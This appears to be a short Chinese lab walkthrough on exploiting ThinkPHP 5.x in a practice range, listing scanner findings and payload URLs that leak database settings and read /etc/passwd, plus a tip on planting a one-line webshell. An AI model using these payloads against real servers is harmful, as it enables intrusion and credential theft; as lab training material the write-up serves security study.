常见框架漏洞攻略-ThinkPHP篇

漏洞名称:Thinkphp5x远程命令执行及getshell
第一步:开启靶场
第二步:准备工具
第三步:启动工具,进行漏洞检测
复制代码
#存在漏洞
1.目标存在tp5_invoke_func_code_exec_1漏洞

2.目标存在tp5_dbinfo_leak漏洞
  payload:
  http://47.103.81.25:8080?s=index/think\config/get&name=database.hostname
  hostname: 127.0.0.1, hostport: , database: , username: , password: root
  
3.目标存在tp5_file_include漏洞
  payload: 
  http://47.103.81.25:8080?s=index/\think\Lang/load&file=/etc/passwd
第四步:选择相应poc,执行tp5_invoke_func_code_exec_1漏洞
第五步:查看tp5_file_include漏洞
第六步:尝试GetShell
注意:

如果采取手工注入需注意:写一句话木马时如果是在双引号中,特殊字符$_GET会被转义而导致无法执行,如果非要使用双引号的话,需要在前添加转义字符

FROM IYU_

相关推荐
Suckerbin9 小时前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
不老刘10 小时前
行为式验证码技术解析:滑块拼图、语序选词与智能无感知
网络安全·验证码·行为式验证码
李白你好11 小时前
CyberPoC 是一个现代化的网络安全练习和竞赛平台,支持容器化部署的安全挑战,为用户提供实践网络安全技能的环境。
web安全
房屋安全鉴定检测15 小时前
房屋安全鉴定报告有效期多久
安全·网络安全
心 一15 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
房屋安全鉴定检测16 小时前
房屋安全鉴定需要什么条件
安全·网络安全
FLS16818 小时前
Kali搭建sqli-labs靶场
linux·sql·安全·网络安全
不是三毛没有半19 小时前
华为USG6000v2 NAT模式下IPSEC IKE V1 实验
网络·网络安全·华为
KKKlucifer19 小时前
网络安全等级保护:等级保护工作、分级保护工作、密码管理工作三者之间的关系
网络·安全·web安全
Suckerbin1 天前
LAMPSecurity: CTF6靶场渗透
笔记·安全·web安全·网络安全